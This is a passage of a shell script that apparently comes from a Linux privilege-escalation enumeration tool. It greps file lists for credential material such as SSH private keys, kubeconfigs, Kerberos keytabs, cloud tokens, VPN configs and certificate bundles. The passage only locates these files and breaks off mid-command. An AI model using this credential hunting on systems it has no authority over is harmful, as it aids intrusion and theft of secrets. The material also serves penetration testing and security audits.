"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "glusterfs\.pem$|glusterfs\.ca$|glusterfs\.key$" | sort | uniq | head
-n 70) PSTORAGE_ANACONDA_KS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "anaconda-ks\.cfg$" | sort | uniq | head -n 70)
PSTORAGE_TERRAFORM=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.tfstate$|.*\.tf$" | sort | uniq | head -n 70)
PSTORAGE_RACOON=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "racoon\.conf$|psk\.txt$" | sort | uniq | head -n 70)
PSTORAGE_KUBERNETES=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"kubeconfig$|bootstrap-kubeconfig$|kubelet-kubeconfig$|kubelet\.conf$|psk\.txt$|\.kube.*$|kubelet$|kube-proxy$|kubernetes$"
| sort | uniq | head -n 70) PSTORAGE_VNC=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '/mime/' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.vnc$|.*vnc.*\.c.*nf.*$|.*vnc.*\.ini$|.*vnc.*\.txt$|.*vnc.*\.xml$" |
sort | uniq | head -n 70) PSTORAGE_LDAP=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "ldap$" | sort | uniq | head -n 70) PSTORAGE_LOG4SHELL=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}lib|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}srv|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}etc|^$GREPHOMESEARCH|^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}lib64|^${ROOT_FOLDER}var|^${ROOT_FOLDER}lib32|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}.cache"
| grep -E "log4j-core.*\.jar$" | sort | uniq | head -n 70)
PSTORAGE_OPENVPN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.ovpn$" | sort | uniq | head -n 70) PSTORAGE_SSH=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"id_dsa.*$|id_rsa.*$|known_hosts$|authorized_hosts$|authorized_keys$|.*\.pub$" |
sort | uniq | head -n 70) PSTORAGE_CERTSB4=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib.*' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.pem$|.*\.cer$|.*\.crt$" | sort | uniq | head -n 70)
PSTORAGE_CERTSBIN=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E
'/usr/share/|/usr/local/lib/|/usr/lib/.*|^/usr/share/|/usr/local/lib/|/usr/lib/.*'
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.csr$|.*\.der$" | sort | uniq | head -n 70)
PSTORAGE_CERTSCLIENT=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '/usr/share/|/usr/local/lib/|/usr/lib/.*' | grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E ".*\.pfx$|.*\.p12$" | sort | uniq | head -n 70)
PSTORAGE_SSH_AGENTS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -v -E '.dll' | grep -E "^${ROOT_FOLDER}tmp" | grep -E "agent.*$" | sort |
uniq | head -n 70) PSTORAGE_SSH_CONFIG=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E "^$GREPHOMESEARCH|^${ROOT_FOLDER}usr" | grep -E "ssh.*config$" | sort
| uniq | head -n 70) PSTORAGE_SNYK=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "snyk\.json$|snyk\.config\.json$" | sort | uniq | head -n 70)
PSTORAGE_CLOUD_CREDENTIALS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"credentials\.db$|legacy_credentials\.db$|adc\.json$|\.boto$|\.credentials\.json$|firebase-tools\.json$|access_tokens\.db$|access_tokens\.json$|accessTokens\.json$|gcloud$|legacy_credentials$|azureProfile\.json$|TokenCache\.dat$|AzureRMContext\.json$|ErrorRecords$|TokenCache\.dat$|\.bluemix$|doctl$"
| sort | uniq | head -n 70) PSTORAGE_ROAD_RECON=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "\.roadtools_auth$" | sort | uniq | head -n 70)
PSTORAGE_FREEIPA=$(echo -e
"$FIND_DIR_CDROM\n$FIND_DIR_HOMESEARCH\n$FIND_DIR_MNT\n$FIND_DIR_VAR\n$FIND_DIR_ETC\n$FIND_DIR_OPT\n$FIND_DIR_APPLICATIONS\n$FIND_DIR_CONCOURSE_KEYS\n$FIND_DIR_PRIVATE\n$FIND_DIR_BIN\n$FIND_DIR_SBIN\n$FIND_DIR_SRV\n$FIND_DIR_TMP\n$FIND_DIR_CACHE\n$FIND_DIR_USR\n$FIND_DIR_SNAP\n$FIND_DIR_CONCOURSE_AUTH\n$FIND_DIR_MEDIA\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "ipa$|dirsrv$" | sort | uniq | head -n 70) PSTORAGE_KERBEROS=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E
"krb5\.conf$|.*\.keytab$|\.k5login$|krb5cc_.*$|kadm5\.acl$|secrets\.ldb$|\.secrets\.mkey$|sssd\.conf$"
| sort | uniq | head -n 70) PSTORAGE_KIBANA=$(echo -e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
"^${ROOT_FOLDER}cdrom|^${ROOT_FOLDER}usr|^${ROOT_FOLDER}opt|^${ROOT_FOLDER}sbin|^${ROOT_FOLDER}var|^${ROOT_FOLDER}media|^${ROOT_FOLDER}snap|^${ROOT_FOLDER}private|^${ROOT_FOLDER}bin|^${ROOT_FOLDER}mnt|^${ROOT_FOLDER}etc|^${ROOT_FOLDER}tmp|^${ROOT_FOLDER}applications|^${ROOT_FOLDER}.cache|^$GREPHOMESEARCH|^${ROOT_FOLDER}srv"
| grep -E "kibana\.y.*ml$" | sort | uniq | head -n 70) PSTORAGE_GRAFANA=$(echo
-e
"$FIND_SRV\n$FIND_VAR\n$FIND_PRIVATE\n$FIND_BIN\n$FIND_TMP\n$FIND_OPT\n$FIND_CACHE\n$FIND_SBIN\n$FIND_SYSTEMD\n$FIND_RUN\n$FIND_CDROM\n$FIND_HOMESEARCH\n$FIND_USR\n$FIND_ETC\n$FIND_APPLICATIONS\n$FIND_SYS\n$FIND_LIB64\n$FIND_MNT\n$FIND_LIB\n$FIND_CONCOURSE_AUTH\n$FIND_SNAP\n$FIND_LIB32\n$FIND_SYSTEM\n$FIND_MEDIA\n$FIND_CONCOURSE_KEYS\n$FIND_CUSTOM\n$FIND_DIR_CUSTOM"
| grep -E
